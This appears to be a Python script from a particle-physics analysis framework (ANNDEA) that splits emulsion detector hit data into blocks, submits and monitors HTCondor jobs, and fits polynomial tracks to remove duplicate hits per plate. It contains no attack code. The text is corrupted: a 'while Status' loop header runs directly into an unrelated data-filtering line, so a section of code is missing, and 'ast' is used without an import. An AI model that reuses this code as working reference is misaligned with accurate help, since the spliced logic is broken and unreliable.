PY_DIR=c[1]\ncsv_reader.close()\nimport sys\nif PY_DIR!='': #Temp solution - the decision was made to move all libraries to EOS drive as AFS get locked during heavy HTCondor submission loads\n sys.path=['',PY_DIR]\n sys.path.append('/usr/lib64/python36.zip')\n sys.path.append('/usr/lib64/python3.6')\n sys.path.append('/usr/lib64/python3.6/lib-dynload')\n sys.path.append('/usr/lib64/python3.6/site-packages')\n sys.path.append('/usr/lib/python3.6/site-packages')\nsys.path.append(AFS_DIR+'/Code/Utilities')\nimport pandas as pd #We use Panda for a routine data processing\npd.options.mode.chained_assignment = None #Silence annoying warnings\nimport math #We use it for data manipulation\nimport numpy as np\nimport os\nimport time\nfrom alive_progress import alive_bar\nimport argparse\nclass bcolors: #We use it for the interface\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nprint(' ')\nprint(' ')\nprint(bcolors.HEADER+\"########################################################################################################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"###################### Initialising ANNDEA Hit Tracking module #####################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"######################### Written by Filips Fedotovs #########################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"######################### PhD Student at UCL #########################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"########################################################################################################\"+bcolors.ENDC)\n#Setting the parser - this script is usually not run directly, but is used by a Master version Counterpart that passes the required arguments\nparser = argparse.ArgumentParser(description='This script prepares training data for training the tracking model')\nparser.add_argument('--Mode', help='Script will continue from the last checkpoint, unless you want to start from the scratch, then type \"Reset\"',default='')\nparser.add_argument('--ModelName',help=\"WHat GNN model would you like to use?\", default='MH_SND_Tracking_5_80_5_80')\nparser.add_argument('--Patience',help=\"How many checks to do before resubmitting the job?\", default='30')\nparser.add_argument('--SubPause',help=\"How long to wait in minutes after submitting 10000 jobs?\", default='60')\nparser.add_argument('--SubGap',help=\"How long to wait in minutes after submitting 10000 jobs?\", default='10000')\nparser.add_argument('--RecBatchID',help=\"Give this reconstruction batch an ID\", default='Test_Batch')\nparser.add_argument('--LocalSub',help=\"Local submission?\", default='N')\nparser.add_argument('--TrackFitCut',help=\"Track Fit cut Residual\", default=\"['1000','10','200']\")\nparser.add_argument('--ForceStatus',help=\"Would you like the program run from specific status number? (Only for advance users)\", default='0')\nparser.add_argument('--RequestExtCPU',help=\"Would you like to request extra CPUs?\", default=1)\nparser.add_argument('--JobFlavour',help=\"Specifying the length of the HTCondor job walltime. Currently at 'workday' which is 8 hours.\", default='workday')\nparser.add_argument('--f',help=\"Please enter the full path to the file with track reconstruction\", default='/eos/experiment/ship/ANNDEA/Data/SND_Emulsion_FEDRA_Raw_B31.csv')\nparser.add_argument('--Xmin',help=\"This option restricts data to only those events that have tracks with hits x-coordinates that are above this value\", default='0')\nparser.add_argument('--Xmax',help=\"This option restricts data to only those events that have tracks with hits x-coordinates that are below this value\", default='0')\nparser.add_argument('--Ymin',help=\"This option restricts data to only those events that have tracks with hits y-coordinates that are above this value\", default='0')\nparser.add_argument('--Ymax',help=\"This option restricts data to only those events that have tracks with hits y-coordinates that are below this value\", default='0')\nparser.add_argument('--Z_overlap',help=\"Enter the level of overlap in integer number between reconstruction blocks along z-axis. (In order to avoid segmentation this value should be more than 1)\", default='3')\nparser.add_argument('--Y_overlap',help=\"Enter the level of overlap in integer number between reconstruction blocks along y-axis. (In order to avoid segmentation this value should be more than 1)\", default='2')\nparser.add_argument('--X_overlap',help=\"Enter the level of overlap in integer number between reconstruction blocks along x-axis. (In order to avoid segmentation this value should be more than 1)\", default='2')\nparser.add_argument('--CheckPoint',help=\"Save cluster sets during individual cluster tracking.\", default='N')\nparser.add_argument('--ReqMemory',help=\"How much memory?\", default='2 GB')\n\n######################################## Parsing argument values #############################################################\nargs = parser.parse_args()\nMode=args.Mode.upper()\nModelName=args.ModelName\nRecBatchID=args.RecBatchID\nPatience=int(args.Patience)\nSubPause=int(args.SubPause)*60\nTrackFitCut=ast.literal_eval(args.TrackFitCut)\nSubGap=int(args.SubGap)\nLocalSub=(args.LocalSub=='Y')\nif LocalSub:\n time_int=0\nelse:\n time_int=10\nJobFlavour=args.JobFlavour\nRequestExtCPU=int(args.RequestExtCPU)\nReqMemory=args.ReqMemory\ninput_file_location=args.f\nXmin,Xmax,Ymin,Ymax=float(args.Xmin),float(args.Xmax),float(args.Ymin),float(args.Ymax)\nZ_overlap,Y_overlap,X_overlap=int(args.Z_overlap),int(args.Y_overlap),int(args.X_overlap)\nSliceData=max(Xmin,Xmax,Ymin,Ymax)>0 #We don't slice data if all values are set to zero simultaneousy (which is the default setting)\n\n#Loading Directory locations\nimport csv\ncsv_reader=open('../config',\"r\")\nconfig = list(csv.reader(csv_reader))\nfor c in config:\n if c[0]=='AFS_DIR':\n AFS_DIR=c[1]\n if c[0]=='EOS_DIR':\n EOS_DIR=c[1]\n if c[0]=='PY_DIR':\n PY_DIR=c[1]\ncsv_reader.close()\nimport sys\nsys.path.insert(1, AFS_DIR+'/Code/Utilities/')\nimport UtilityFunctions as UF #This is where we keep routine utility functions\nimport Parameters as PM #This is where we keep framework global parameters\n\n#Establishing paths\nEOSsubDIR=EOS_DIR+'/'+'ANNDEA'\nEOSsubModelDIR=EOSsubDIR+'/'+'Models'\nModel_Meta_Path=EOSsubModelDIR+'/'+args.ModelName+'_Meta'\nprint(UF.TimeStamp(),bcolors.BOLD+'Preparation 1/3:'+bcolors.ENDC+' Setting up metafiles...')\n#Loading the model meta file\nprint(UF.TimeStamp(),'Loading the data file ',bcolors.OKBLUE+Model_Meta_Path+bcolors.ENDC)\n\nif args.ModelName=='blank':\n print(UF.TimeStamp(),bcolors.WARNING+'You have specified the model name as \"blank\": This means that no GNN model will be used as part of the tracking process which can degrade the tracking performance.'+bcolors.ENDC)\n UserAnswer=input(bcolors.BOLD+\"Do you want to continue? (y/n)\\n\"+bcolors.ENDC)\n if UserAnswer.upper()=='N':\n exit()\n stepX=PM.stepX\n stepY=PM.stepY\n stepZ=PM.stepZ\n cut_dt=PM.cut_dt\n cut_dr=PM.cut_dr\nelif os.path.isfile(Model_Meta_Path):\n Model_Meta_Raw=UF.PickleOperations(Model_Meta_Path, 'r', 'N/A')\n print(Model_Meta_Raw[1])\n Model_Meta=Model_Meta_Raw[0]\n stepX=Model_Meta.stepX\n stepY=Model_Meta.stepY\n stepZ=Model_Meta.stepZ\n cut_dt=Model_Meta.cut_dt\n cut_dr=Model_Meta.cut_dr\nelse:\n print(UF.TimeStamp(),bcolors.FAIL+'Fail! No existing model meta files have been found, exiting now'+bcolors.ENDC)\n exit()\n\n######################################## Phase 1 - Create compact source file #########################################\nprint(UF.TimeStamp(),bcolors.BOLD+'Preparation 2/3:'+bcolors.ENDC+' Preparing the source data...')\nrequired_file_location=EOS_DIR+'/ANNDEA/Data/REC_SET/RTr1_'+RecBatchID+'_hits.csv'\nif os.path.isfile(required_file_location)==False or Mode=='RESET':\n print(UF.TimeStamp(),'Loading raw data from',bcolors.OKBLUE+input_file_location+bcolors.ENDC)\n data=pd.read_csv(input_file_location,\n header=0,\n usecols=[PM.Hit_ID,PM.x,PM.y,PM.z,PM.tx,PM.ty])[[PM.Hit_ID,PM.x,PM.y,PM.z,PM.tx,PM.ty]]\n total_rows=len(data.axes[0])\n data[PM.Hit_ID] = data[PM.Hit_ID].astype(str)\n print(UF.TimeStamp(),'The raw data has ',total_rows,' hits')\n print(UF.TimeStamp(),'Removing unreconstructed hits...')\n data=data.dropna()\n final_rows=len(data.axes[0])\n print(UF.TimeStamp(),'The cleaned data has ',final_rows,' hits')\n try:\n data[PM.Hit_ID] = data[PM.Hit_ID].astype(int)\n except:\n print(UF.TimeStamp(), bcolors.WARNING+\"Hit ID is already in the string format, skipping the reformatting step...\"+bcolors.ENDC)\n data[PM.Hit_ID] = data[PM.Hit_ID].astype(str)\n \n if SliceData:\n print(UF.TimeStamp(),'Slicing the data...')\n data=data.drop(data.index[(data[PM.x] > Xmax) | (data[PM.x] < Xmin) | (data[PM.y] > Ymax) | (data[PM.y] < Ymin)])\n final_rows=len(data.axes[0])\n print(UF.TimeStamp(),'The sliced data has ',final_rows,' hits')\n data=data.rename(columns={PM.x: \"x\"})\n data=data.rename(columns={PM.y: \"y\"})\n data=data.rename(columns={PM.z: \"z\"})\n data=data.rename(columns={PM.tx: \"tx\"})\n data=data.rename(columns={PM.ty: \"ty\"})\n data=data.rename(columns={PM.Hit_ID: \"Hit_ID\"})\n print(UF.TimeStamp(),'Analysing data... ',bcolors.ENDC)\n z_offset=data['z'].min()\n data['z']=data['z']-z_offset\n z_max=data['z'].max()\n if Z_overlap==1:\n Zsteps=math.ceil((z_max)/stepZ)\n else:\n Zsteps=(math.ceil((z_max)/stepZ)*(Z_overlap))-1\n y_offset=data['y'].min()\n x_offset=data['x'].min()\n data['x']=data['x']-x_offset\n data['y']=data['y']-y_offset\n x_max=data['x'].max()\n y_max=data['y'].max()\n \n #Calculating the number of volumes that will be sent to HTCondor for reconstruction. Account for overlap if specified.\n if X_overlap==1:\n Xsteps=math.ceil((x_max)/stepX)\n else:\n Xsteps=(math.ceil((x_max)/stepX)*(X_overlap))-1\n \n if Y_overlap==1:\n Ysteps=math.ceil((y_max)/stepY)\n else:\n Ysteps=(math.ceil((y_max)/stepY)*(Y_overlap))-1\n print(UF.TimeStamp(),'Distributing input files...')\n for i in range(Xsteps):\n for j in range(Ysteps):\n Y_ID=int(j)/Y_overlap\n X_ID=int(i)/X_overlap\n tdata=data.drop(data.index[data['x'] >= ((X_ID+1)*stepX)]) #Keeping the relevant z slice\n tdata.drop(tdata.index[tdata['x'] < (X_ID*stepX)], inplace = True) #Keeping the relevant z slice\n tdata.drop(tdata.index[tdata['y'] >= ((Y_ID+1)*stepY)], inplace = True) #Keeping the relevant z slice\n tdata.drop(tdata.index[tdata['y'] < (Y_ID*stepY)], inplace = True) #Keeping the relevant z slice\n required_tfile_location=EOS_DIR+'/ANNDEA/Data/REC_SET/RTr1_'+RecBatchID+'_'+str(i)+'_'+str(j)+'_hits.csv'\n tdata.to_csv(required_tfile_location,index=False)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"The segment data has been created successfully and written to\"+bcolors.ENDC, bcolors.OKBLUE+required_tfile_location+bcolors.ENDC)\n data.to_csv(required_file_location,index=False)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"The segment data has been created successfully and written to\"+bcolors.ENDC, bcolors.OKBLUE+required_file_location+bcolors.ENDC)\n\n# ######################################## Preset framework parameters #########################################\ninput_file_location=EOS_DIR+'/ANNDEA/Data/REC_SET/RTr1_'+RecBatchID+'_hits.csv'\nprint(UF.TimeStamp(),'Loading preselected data from ',bcolors.OKBLUE+input_file_location+bcolors.ENDC)\ndata=pd.read_csv(input_file_location,header=0,usecols=['z','x','y'])\nprint(UF.TimeStamp(),'Analysing data... ',bcolors.ENDC)\nz_offset=data['z'].min()\ndata['z']=data['z']-z_offset\nz_max=data['z'].max()\nif Z_overlap==1:\n Zsteps=math.ceil((z_max)/stepZ)\nelse:\n Zsteps=(math.ceil((z_max)/stepZ)*(Z_overlap))-1\ny_offset=data['y'].min()\nx_offset=data['x'].min()\ndata['x']=data['x']-x_offset\ndata['y']=data['y']-y_offset\nx_max=data['x'].max()\ny_max=data['y'].max()\nFreshStart=True\nProgram=[]\n#Calculating the number of volumes that will be sent to HTCondor for reconstruction. Account for overlap if specified.\nif X_overlap==1:\n Xsteps=math.ceil((x_max)/stepX)\nelse:\n Xsteps=(math.ceil((x_max)/stepX)*(X_overlap))-1\n\nif Y_overlap==1:\n Ysteps=math.ceil((y_max)/stepY)\nelse:\n Ysteps=(math.ceil((y_max)/stepY)*(Y_overlap))-1\n\n#Defining handy functions to make the code little cleaner\n\n#The function bellow helps to monitor the HTCondor jobs and keep the submission flow\ndef AutoPilot(wait_min, interval_min, max_interval_tolerance,program):\n print(UF.TimeStamp(),'Going on an autopilot mode for ',wait_min, 'minutes while checking HTCondor every',interval_min,'min',bcolors.ENDC)\n wait_sec=wait_min*60\n interval_sec=interval_min*60\n intervals=int(math.ceil(wait_sec/interval_sec))\n for interval in range(1,intervals+1):\n time.sleep(interval_sec)\n print(UF.TimeStamp(),\"Scheduled job checkup...\") #Progress display\n bad_pop=UF.CreateCondorJobs(program[1][0],\n program[1][1],\n program[1][2],\n program[1][3],\n program[1][4],\n program[1][5],\n program[1][6],\n program[1][7],\n program[1][8],\n program[2],\n program[3],\n program[1][9],\n False)\n if len(bad_pop)>0:\n print(UF.TimeStamp(),bcolors.WARNING+'Autopilot status update: There are still', len(bad_pop), 'HTCondor jobs remaining'+bcolors.ENDC)\n if interval%max_interval_tolerance==0:\n for bp in bad_pop:\n UF.SubmitJobs2Condor(bp,program[5],RequestExtCPU,JobFlavour,ReqMemory)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"All jobs have been resubmitted\"+bcolors.ENDC)\n else:\n return True,False\n return False,False\n#The function bellow helps to automate the submission process\ndef StandardProcess(program,status,freshstart):\n print(bcolors.HEADER+\"#############################################################################################\"+bcolors.ENDC)\n print(UF.TimeStamp(),bcolors.BOLD+'Stage '+str(status)+':'+bcolors.ENDC+str(program[status][0]))\n batch_sub=program[status][4]>1\n bad_pop=UF.CreateCondorJobs(program[status][1][0],\n program[status][1][1],\n program[status][1][2],\n program[status][1][3],\n program[status][1][4],\n program[status][1][5],\n program[status][1][6],\n program[status][1][7],\n program[status][1][8],\n program[status][2],\n program[status][3],\n program[status][1][9],\n False)\n if len(bad_pop)==0:\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n\n\n elif (program[status][4])==len(bad_pop):\n bad_pop=UF.CreateCondorJobs(program[status][1][0],\n program[status][1][1],\n program[status][1][2],\n program[status][1][3],\n program[status][1][4],\n program[status][1][5],\n program[status][1][6],\n program[status][1][7],\n program[status][1][8],\n program[status][2],\n program[status][3],\n program[status][1][9],\n batch_sub)\n print(UF.TimeStamp(),'Submitting jobs to HTCondor... ',bcolors.ENDC)\n _cnt=0\n for bp in bad_pop:\n if _cnt>SubGap:\n print(UF.TimeStamp(),'Pausing submissions for ',str(int(SubPause/60)), 'minutes to relieve congestion...',bcolors.ENDC)\n time.sleep(SubPause)\n _cnt=0\n UF.SubmitJobs2Condor(bp,program[status][5],RequestExtCPU,JobFlavour,ReqMemory)\n _cnt+=bp[6]\n if program[status][5]:\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n elif AutoPilot(600,time_int,Patience,program[status]):\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n else:\n print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is uncompleted...'+bcolors.ENDC)\n return False,False\n\n\n elif len(bad_pop)>0:\n if freshstart:\n print(UF.TimeStamp(),bcolors.WARNING+'Warning, there are still', len(bad_pop), 'HTCondor jobs remaining'+bcolors.ENDC)\n print(bcolors.BOLD+'If you would like to wait and exit please enter E'+bcolors.ENDC)\n print(bcolors.BOLD+'If you would like to wait please enter enter the maximum wait time in minutes'+bcolors.ENDC)\n print(bcolors.BOLD+'If you would like to resubmit please enter R'+bcolors.ENDC)\n UserAnswer=input(bcolors.BOLD+\"Please, enter your option\\n\"+bcolors.ENDC)\n if UserAnswer=='E':\n print(UF.TimeStamp(),'OK, exiting now then')\n exit()\n if UserAnswer=='R':\n _cnt=0\n for bp in bad_pop:\n if _cnt>SubGap:\n print(UF.TimeStamp(),'Pausing submissions for ',str(int(SubPause/60)), 'minutes to relieve congestion...',bcolors.ENDC)\n time.sleep(SubPause)\n _cnt=0\n UF.SubmitJobs2Condor(bp,program[status][5],RequestExtCPU,JobFlavour,ReqMemory)\n _cnt+=bp[6]\n print(UF.TimeStamp(), bcolors.OKGREEN+\"All jobs have been resubmitted\"+bcolors.ENDC)\n if program[status][5]:\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n elif AutoPilot(600,time_int,Patience,program[status]):\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+ 'has successfully completed'+bcolors.ENDC)\n return True,False\n else:\n print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is uncompleted...'+bcolors.ENDC)\n return False,False\n else:\n if program[status][5]:\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n elif AutoPilot(int(UserAnswer),time_int,Patience,program[status]):\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+ 'has successfully completed'+bcolors.ENDC)\n return True,False\n else:\n print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is uncompleted...'+bcolors.ENDC)\n return False,False\n else:\n _cnt=0\n for bp in bad_pop:\n if _cnt>SubGap:\n print(UF.TimeStamp(),'Pausing submissions for ',str(int(SubPause/60)), 'minutes to relieve congestion...',bcolors.ENDC)\n time.sleep(SubPause)\n _cnt=0\n UF.SubmitJobs2Condor(bp,program[status][5],RequestExtCPU,JobFlavour,ReqMemory)\n _cnt+=bp[6]\n if program[status][5]:\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n elif AutoPilot(600,time_int,Patience,program[status]):\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+ 'has successfully completed'+bcolors.ENDC)\n return True,False\n else:\n print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is uncompleted...'+bcolors.ENDC)\n return False,False\n\n#If we chose reset mode we do a full cleanup.\n# #Reconstructing a single brick can cause in gereation of 100s of thousands of files - need to make sure that we remove them.\nif Mode=='RESET':\n print(UF.TimeStamp(),'Performing the cleanup... ',bcolors.ENDC)\n HTCondorTag=\"SoftUsed == \\\"ANNDEA-RTr1a-\"+RecBatchID+\"\\\"\"\n UF.RecCleanUp(AFS_DIR, EOS_DIR, 'RTr1_'+RecBatchID, ['RTr1a','RTr1b','RTr1c','RTr1d',RecBatchID+'_RTr_OUTPUT_CLEANED.csv'], HTCondorTag)\n FreshStart=False\nif Mode=='CLEANUP':\n Status=5\nelse:\n Status=int(args.ForceStatus)\n################ Set the execution sequence for the script\n###### Stage 0\nprog_entry=[]\njob_sets=[]\nfor i in range(0,Xsteps):\n job_sets.append(Ysteps)\nprog_entry.append(' Sending hit cluster to the HTCondor, so the model assigns weights between hits')\nprog_entry.append([AFS_DIR,EOS_DIR,PY_DIR,'/ANNDEA/Data/REC_SET/','hit_cluster_rec_set','RTr1a','.csv',RecBatchID,job_sets,'RTr1a_ReconstructTracks_Sub.py'])\nprog_entry.append([' --stepZ ', ' --stepY ', ' --stepX ', ' --cut_dt ', ' --cut_dr ', ' --ModelName ',' --Z_overlap ',' --Y_overlap ',' --X_overlap ', ' --Z_ID_Max ', ' --CheckPoint ', ' --TrackFitCutRes ',' --TrackFitCutSTD ',' --TrackFitCutMRes '])\nprog_entry.append([stepZ,stepY,stepX, cut_dt,cut_dr, ModelName,Z_overlap,Y_overlap,X_overlap, Zsteps, args.CheckPoint]+TrackFitCut)\nprog_entry.append(Xsteps*Ysteps)\nprog_entry.append(LocalSub)\nProgram.append(prog_entry)\n\nif Mode=='RESET':\n print(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Delete'))\n#Setting up folders for the output. The reconstruction of just one brick can easily generate >100k of files. Keeping all that blob in one directory can cause problems on lxplus.\nprint(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Create'))\n\n###### Stage 1\nprog_entry=[]\njob_sets=Xsteps\nprog_entry.append(' Sending hit cluster to the HTCondor, so the reconstructed clusters can be merged along y-axis')\nprog_entry.append([AFS_DIR,EOS_DIR,PY_DIR,'/ANNDEA/Data/REC_SET/','hit_cluster_rec_y_set','RTr1b','.csv',RecBatchID,job_sets,'RTr1b_LinkSegmentsY_Sub.py'])\nprog_entry.append([' --Y_ID_Max ', ' --i '])\nprog_entry.append([Ysteps,Xsteps])\nprog_entry.append(Xsteps)\nprog_entry.append(LocalSub)\nProgram.append(prog_entry)\nif Mode=='RESET':\n print(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Delete'))\n#Setting up folders for the output. The reconstruction of just one brick can easily generate >100k of files. Keeping all that blob in one directory can cause problems on lxplus.\nprint(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Create'))\n\n###### Stage 2\nprog_entry=[]\njob_sets=1\nprog_entry.append(' Sending hit cluster to the HTCondor, so the reconstructed clusters can be merged along x-axis')\nprog_entry.append([AFS_DIR,EOS_DIR,PY_DIR,'/ANNDEA/Data/REC_SET/','hit_cluster_rec_x_set','RTr1c','.csv',RecBatchID,job_sets,'RTr1c_LinkSegmentsX_Sub.py'])\nprog_entry.append([' --X_ID_Max '])\nprog_entry.append([Xsteps])\nprog_entry.append(1)\nprog_entry.append(True) #This part we can execute locally, no need for HTCondor\nProgram.append(prog_entry)\nif Mode=='RESET':\n print(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Delete'))\n#Setting up folders for the output. The reconstruction of just one brick can easily generate >100k of files. Keeping all that blob in one directory can cause problems on lxplus.\nprint(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Create'))\n\n###### Stage 3\nProgram.append('Custom')\n\n\nprint(UF.TimeStamp(),'There are '+str(len(Program)+1)+' stages (0-'+str(len(Program)+1)+') of this script',bcolors.ENDC)\nprint(UF.TimeStamp(),'Current stage has a code',Status,bcolors.ENDC)\nwhile Status Xmax) | (Data[PM.x] < Xmin) | (Data[PM.y] > Ymax) | (Data[PM.y] < Ymin)]) #The focus area where we reconstruct\n else:\n CutData=Data #If we reconstruct the whole brick we jsut take the whole data. No need to separate.\n\n CutData.drop([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID'],axis=1,inplace=True,errors='ignore') #Removing old ANNDEA reconstruction results so we can overwrite with the new ones\n #Map reconstructed ANN tracks to hits in the Raw file - this is in essesential for the final output of the tracking\n TrackMap['HitID'] = TrackMap['HitID'].astype(str)\n CutData[PM.Hit_ID] = CutData[PM.Hit_ID].astype(str)\n CutData=pd.merge(CutData,TrackMap,how='left', left_on=[PM.Hit_ID], right_on=['HitID'])\n\n CutData.drop(['HitID'],axis=1,inplace=True) #Make sure that HitID is not the Hit ID name in the raw data.\n Data=CutData\n\n\n #It was discovered that the output is not perfect: while the hit fidelity is achieved we don't have a full plate hit fidelity for a given track. It is still possible for a track to have multiple hits at one plate.\n #In order to fix it we need to apply some additional logic to those problematic tracks.\n print(UF.TimeStamp(),'Identifying problematic tracks where there is more than one hit per plate...')\n Hit_Map=Data[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.x,PM.y,PM.z,PM.tx,PM.ty,PM.Hit_ID]] #Separating the hit map\n Data.drop([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID'],axis=1,inplace=True) #Remove the ANNDEA tracking info from the main data\n\n\n\n\n\n Hit_Map=Hit_Map.dropna() #Remove unreconstructing hits - we are not interested in them atm\n Hit_Map_Stats=Hit_Map[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,PM.Hit_ID]] #Calculating the stats\n\n Hit_Map_Stats=Hit_Map_Stats.groupby([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID']).agg({PM.z:pd.Series.nunique,PM.Hit_ID: pd.Series.nunique}).reset_index() #Calculate the number fo unique plates and hits\n Ini_No_Tracks=len(Hit_Map_Stats)\n print(UF.TimeStamp(),bcolors.WARNING+'The initial number of tracks is '+ str(Ini_No_Tracks)+bcolors.ENDC)\n Hit_Map_Stats=Hit_Map_Stats.rename(columns={PM.z: \"No_Plates\",PM.Hit_ID:\"No_Hits\"}) #Renaming the columns so they don't interfere once we join it back to the hit map\n Hit_Map_Stats=Hit_Map_Stats[Hit_Map_Stats.No_Plates >= PM.MinHitsTrack]\n Prop_No_Tracks=len(Hit_Map_Stats)\n print(UF.TimeStamp(),bcolors.WARNING+'After dropping single hit tracks, left '+ str(Prop_No_Tracks)+' tracks...'+bcolors.ENDC)\n Hit_Map=pd.merge(Hit_Map,Hit_Map_Stats,how='inner',on = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID']) #Join back to the hit map\n Good_Tracks=Hit_Map[Hit_Map.No_Plates == Hit_Map.No_Hits] #For all good tracks the number of hits matches the number of plates, we won't touch them\n Good_Tracks=Good_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.Hit_ID]] #Just strip off the information that we don't need anymore\n\n Bad_Tracks=Hit_Map[Hit_Map.No_Plates < Hit_Map.No_Hits] #These are the bad guys. We need to remove this extra hits\n Bad_Tracks=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.x,PM.y,PM.z,PM.tx,PM.ty,PM.Hit_ID]]\n\n #Id the problematic plates\n Bad_Tracks_Stats=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,PM.Hit_ID]]\n Bad_Tracks_Stats=Bad_Tracks_Stats.groupby([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z])[PM.Hit_ID].nunique().reset_index() #Which plates have double hits?\n Bad_Tracks_Stats=Bad_Tracks_Stats.rename(columns={PM.Hit_ID: \"Problem\"}) #Renaming the columns so they don't interfere once we join it back to the hit map\n Bad_Tracks_Stats[RecBatchID+'_Brick_ID'] = Bad_Tracks_Stats[RecBatchID+'_Brick_ID'].astype(str)\n Bad_Tracks_Stats[RecBatchID+'_Track_ID'] = Bad_Tracks_Stats[RecBatchID+'_Track_ID'].astype(str)\n Bad_Tracks[RecBatchID+'_Brick_ID'] = Bad_Tracks[RecBatchID+'_Brick_ID'].astype(str)\n Bad_Tracks[RecBatchID+'_Track_ID'] = Bad_Tracks[RecBatchID+'_Track_ID'].astype(str)\n Bad_Tracks=pd.merge(Bad_Tracks,Bad_Tracks_Stats,how='inner',on = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z])\n\n\n\n Bad_Tracks.sort_values([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z],ascending=[0,0,1],inplace=True)\n\n Bad_Tracks_CP_File=EOS_DIR+'/ANNDEA/Data/REC_SET/Temp_RTr1c_'+RecBatchID+'_0'+'/RTr1c_'+RecBatchID+'_Bad_Tracks_CP.csv'\n if os.path.isfile(Bad_Tracks_CP_File)==False or Mode=='RESET':\n\n Bad_Tracks_Head=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID']]\n Bad_Tracks_Head.drop_duplicates(inplace=True)\n Bad_Tracks_List=Bad_Tracks.values.tolist() #I find it is much easier to deal with tracks in list format when it comes to fitting\n Bad_Tracks_Head=Bad_Tracks_Head.values.tolist()\n Bad_Track_Pool=[]\n\n #Bellow we build the track representatation that we can use to fit slopes\n with alive_bar(len(Bad_Tracks_Head),force_tty=True, title='Building track representations...') as bar:\n for bth in Bad_Tracks_Head:\n bar()\n bth.append([])\n bt=0\n trigger=False\n while bt<(len(Bad_Tracks_List)):\n if (bth[0]==Bad_Tracks_List[bt][0] and bth[1]==Bad_Tracks_List[bt][1]):\n if Bad_Tracks_List[bt][8]==1: #We only build polynomials for hits in a track that do not have duplicates - these are 'trusted hits'\n bth[2].append(Bad_Tracks_List[bt][2:-2])\n del Bad_Tracks_List[bt]\n bt-=1\n trigger=True\n elif trigger:\n break\n else:\n continue\n bt+=1\n\n\n with alive_bar(len(Bad_Tracks_Head),force_tty=True, title='Fitting the tracks...') as bar:\n for bth in Bad_Tracks_Head:\n bar()\n if len(bth[2])==1: #Only one trusted hit - In these cases whe we take only tx and ty slopes of the single base track. Polynomial of the first degree and the equations of the line are x=ax+tx*z and y=ay+ty*z\n x=bth[2][0][0]\n z=bth[2][0][2]\n tx=bth[2][0][3]\n ax=x-tx*z\n bth.append(ax) #Append x intercept\n bth.append(tx) #Append x slope\n bth.append(0) #Append a placeholder slope (for polynomial case)\n y=bth[2][0][1]\n ty=bth[2][0][4]\n ay=y-ty*z\n bth.append(ay) #Append x intercept\n bth.append(ty) #Append x slope\n bth.append(0) #Append a placeholder slope (for polynomial case)\n del(bth[2])\n elif len(bth[2])==2: #Two trusted hits - In these cases whe we fit a polynomial of the first degree and the equations of the line are x=ax+tx*z and y=ay+ty*z\n x,y,z=[],[],[]\n x=[bth[2][0][0],bth[2][1][0]]\n y=[bth[2][0][1],bth[2][1][1]]\n z=[bth[2][0][2],bth[2][1][2]]\n tx=np.polyfit(z,x,1)[0]\n ax=np.polyfit(z,x,1)[1]\n ty=np.polyfit(z,y,1)[0]\n ay=np.polyfit(z,y,1)[1]\n bth.append(ax) #Append x intercept\n bth.append(tx) #Append x slope\n bth.append(0) #Append a placeholder slope (for polynomial case)\n bth.append(ay) #Append x intercept\n bth.append(ty) #Append x slope\n bth.append(0) #Append a placeholder slope (for polynomial case)\n del(bth[2])\n elif len(bth[2])==0:\n del(bth)\n continue\n else: #Three pr more trusted hits - In these cases whe we fit a polynomial of the second degree and the equations of the line are x=ax+(t1x*z)+(t2x*z*z) and y=ay+(t1y*z)+(t2y*z*z)\n x,y,z=[],[],[]\n for i in bth[2]:\n x.append(i[0])\n for j in bth[2]:\n y.append(j[1])\n for k in bth[2]:\n z.append(k[2])\n t2x=np.polyfit(z,x,2)[0]\n t1x=np.polyfit(z,x,2)[1]\n 